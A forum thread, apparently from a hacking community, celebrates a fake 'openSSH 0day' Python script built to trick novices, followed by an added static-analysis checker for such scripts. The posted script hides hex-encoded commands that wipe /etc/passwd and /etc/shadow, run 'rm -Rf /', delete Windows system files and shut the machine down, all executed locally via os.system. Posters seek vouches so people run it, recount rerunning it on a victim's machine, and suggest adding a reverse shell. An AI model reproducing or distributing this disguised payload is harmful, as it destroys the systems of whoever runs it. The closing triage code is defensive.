The Thread Of Troll!
  • Sh3llc0d3
    Posts: 1,910
    Well when you thought the internet had seen all the troll'in it could, you were wrong!!!

    Chronic-"skid-slayer"-command posted the ultimate troll on HF tonight, a '0day SSH exploit' which to you and me deletes major system files using the shellcode...

    Link: http://tinyurl.com/66xfq9z


    [spoiler=Screenie 1]http://i52.tinypic.com/nb4spx.png[/spoiler]

    [spoiler=Screenie 2]http://i55.tinypic.com/2rrsysg.png[/spoiler]


    Source code ;)
    #!/usr/bin/python
    #openSSH 5.7 0day
    #greets to _st4ck3d*, x3n0n xin etc. You know who you are ;)
    import os, sys, socket
    nop = \"\x90\" #NOP(No OPeration)

    #Winblows shellcode - Length = 140
    shellcode_windows=(\"\x65\x63\x68\x6f\x20\x22\x2f\x62\x69\x6e\x2f\x73\x68\x22\x20\x26\x20\"
    \"\x65\x63\x68\x6f\x20\x22\x22\x20\x26\x20\x65\x63\x68\x6f\x20\x22\x53\x65\x67\x6d\"
    \"\x65\x6e\x74\x61\x74\x69\x6f\x6e\x20\x66\x61\x75\x6c\x74\x22\x20\x26\x20\x64\x65\"
    \"\x6c\x20\x25\x77\x69\x6e\x64\x69\x72\x25\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x5c\"
    \"\x68\x61\x6c\x2e\x64\x6c\x6c\x20\x26\x20\x64\x65\x6c\x20\x25\x77\x69\x6e\x64\x69\"
    \"\x72\x25\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x5c\x75\x73\x65\x72\x69\x6e\x69\x74\"
    \"\x2e\x65\x78\x65\x20\x26\x20\x73\x68\x75\x74\x64\x6f\x77\x6e\x20\x2d\x73\x20\x2d\"
    \"\x74\x20\x31\")


    #UNIX / Mac shellcode - Length = 86
    shellcode=(\"\x65\x63\x68\x6f\x20\x22\x22\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\"
    \"\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x3b\x20\x65\"
    \"\x63\x68\x6f\x20\x22\x22\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\"
    \"\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\"
    \"\x22\x22\x20\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\")


    def usage():
    print(\"Usage: ./exploit <IP> <port>\")
    print(\"Example: ./exploit 127.0.0.1 22\")

    def platformcheck():
    platform = os.name
    if platform == 'posix': #If platform is posix(for linux)
    isroot()
    elif platform == 'nt': #If platform is a windows platform
    winblows()
    elif platform == 'mac': #If platform is mac
    isroot()

    def winblows():
    print(\"Remember to run as ADMIN!!!!!!!\")
    if len(sys.argv) != 3:
    usage()
    sys.exit()
    else:
    host=sys.argv[1]
    port=int(sys.argv[2])
    print(\"\t[+]Connecting to host...\")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)#Socket
    print(\"\t[+]Generating payload...\")
    derp = (nop * 1024 + \"\x44\" * 31788)
    derp += (\"\xeb\x14\") # JMP
    derp += (\"\x44\" * 6)
    derp += (\"\xad\xbb\xc3\x77\") # ECX 0x77C3BBAD
    derp += (\"\xb4\x73\xed\x77\") # EAX 0x77ED73B4
    derp += (nop * 21) #NOPS
    derp += shellcode_windows
    print(\"\t[+]Sending payload...\")
    s.connect((host,port)) #Connect to host
    s.send(derp)
    os.system(shellcode_windows)


    def isroot():
    ifroot = os.getuid()
    if ifroot != 0:
    print(\"[!!]Error: Must be run as root\n\")
    sys.exit()
    else:
    exploit()

    def exploit():
    if len(sys.argv) != 3:
    usage()
    sys.exit()
    else:
    host=sys.argv[1]
    port=int(sys.argv[2])
    print(\"\t[+]Connecting to host...\")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print(\"\t[+]Generating payload...\")
    derp = (nop * 1024 + \"\x44\" * 31788)
    derp += (\"\xeb\x14\") # JMP
    derp += (\"\x44\" * 6)
    derp += (\"\xad\xbb\xc3\x77\") # ECX 0x77C3BBAD
    derp += (\"\xb4\x73\xed\x77\") # EAX 0x77ED73B4
    derp += (nop * 21) #NOPS
    derp += shellcode
    print(\"\t[+]Sending payload...\")
    s.connect((host,port))
    s.send(derp)
    os.system(shellcode)

    platformcheck()


    And for people thinkin I'm running xchat as root it's a separate account with escalated shell ;)
  • Epic wins. I need people to vouch in the thread so people run it. Please 5 star it + vouch for teh epic lulz :D

    EDIT: Some more lulzy screenies:
    [spoiler]http://img213.imageshack.us/img213/2690/201101251947371366x768s.png[/spoiler]
    [spoiler]http://img826.imageshack.us/img826/6338/201101251947491366x768s.png[/spoiler]
    [spoiler]http://img813.imageshack.us/img813/6240/201101252012401366x768s.png[/spoiler]
    [spoiler]http://img831.imageshack.us/img831/8543/201101252233271366x768s.png[/spoiler]
    ^Then I teamviewed him, reran it as admin and his computer restarted and there went my teamview connection. He hasn't been online since...

    [spoiler]http://img151.imageshack.us/img151/862/201101252309181366x768s.png[/spoiler]
    OH SHEEEET I've been spotted. Even though he left out the fact it fucks your machine up.
  • Xin
    Posts: 3,251
    Haha chronic that's hilarious, should have made some sort of reverse shell where you could 0wn them! :)
    Would have made for more lulz, I wonder if our troll posts on that skiddy thread have had any feedback
    Xin
  • Sh3llc0d3
    Posts: 1,910
    said:


    Haha chronic that's hilarious, should have made some sort of reverse shell where you could 0wn them! :)
    Would have made for more lulz, I wonder if our troll posts on that skiddy thread have had any feedback



    @chronic: told you he'd like it lol
  • said:


    said:


    Haha chronic that's hilarious, should have made some sort of reverse shell where you could 0wn them! :)
    Would have made for more lulz, I wonder if our troll posts on that skiddy thread have had any feedback



    @chronic: told you he'd like it lol


    Lol everybody loves it because it's awesome. Although the back connect idea is a really good idea. Should have made it run a metasploit executable.
    [hr]
    Lol some more epic screenshots. I have officially been found out.
    [spoiler]http://img830.imageshack.us/img830/7406/201101261636431366x768s.png[/spoiler]
    [spoiler]http://img593.imageshack.us/img593/6672/201101261636501366x768s.png[/spoiler]
    [spoiler]http://img441.imageshack.us/img441/5905/201101261636571366x768s.png[/spoiler]
    [spoiler]http://img526.imageshack.us/img526/4664/201101261637101366x768s.png[/spoiler]
    [spoiler]http://img337.imageshack.us/img337/2065/201101261638251366x768s.png[/spoiler]
    Some dude made a thread about it lol
    http://www.hackforums.net/showthread.php?tid=1007521
    And now I have 8 rep. FTW lol.
    DOWN TO -1 FUCK YEA
    [spoiler]http://img823.imageshack.us/img823/9595/201101261649241366x768s.png[/spoiler]
  • undead
    Posts: 822
    YEAH!1! I'M A HACKER NOW! Th4nX!
    edit: my computer haz a viruzz!!
    edit 2: i'm crying! please how do i remove the viruzzzz!?!1??
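
A static triage check for untrusted proof-of-concept scripts like the one in the first post, as an added example that is not part of the thread: it reads the file as text only, decodes `\x..` strings, and reports any blob that is plain ASCII and is also handed to a local command runner such as `os.system`. The sample input is constructed and harmless, and the function names are this example's own.

```python
import re
import string
HEX_RUN = re.compile(r'(?:\\x[0-9a-fA-F]{2})+')
ASSIGN = re.compile(r'\s*(\w+)\s*=\s*\(?\s*["\']\\x')   # name = ("\x..
CONTINUES = re.compile(r'\s*["\']\\x')                   # "\x.. on a following line
LOCAL_EXEC = re.compile(r'\b(?:os\.system|os\.popen|subprocess\.\w+)\s*\(\s*(\w+)')
PRINTABLE = set(string.printable.encode())

def decode_blobs(source):
    """Map variable name -> decoded bytes, never importing or running the file."""
    blobs, current = {}, None
    for line in source.splitlines():
        m = ASSIGN.match(line)
        if m:
            current = m.group(1)
            blobs[current] = b""
        elif not CONTINUES.match(line):
            current = None          # any other line ends the string literal
        if current:
            for run in HEX_RUN.findall(line):
                blobs[current] += bytes.fromhex(run.replace("\\x", ""))
    return blobs

def triage(source):
    """Describe each blob: is it readable text, and is it executed locally?"""
    executed = set(LOCAL_EXEC.findall(source))
    report = {}
    for name, blob in decode_blobs(source).items():
        text_like = len(blob) >= 4 and all(b in PRINTABLE for b in blob)
        report[name] = {
            "decoded": blob.decode("ascii") if text_like else None,
            "run_locally": name in executed,
        }
    return report

def suspicious(source):
    """Blobs that are readable shell text AND passed to a local command runner."""
    return sorted(n for n, r in triage(source).items()
                  if r["decoded"] is not None and r["run_locally"])

# Constructed, harmless sample in the same shape as the posted script.
SAMPLE = r'''
import os
nop = "\x90"
shellcode = ("\x65\x63\x68\x6f\x20"
"\x68\x65\x6c\x6c\x6f")
s.send(nop * 16 + shellcode)
os.system(shellcode)
'''
```

Compiled machine code almost never decodes to clean printable text, so a "shellcode" blob that reads as a shell command and is also passed to `os.system` is a command that runs on the machine of whoever launches the script, not on the target.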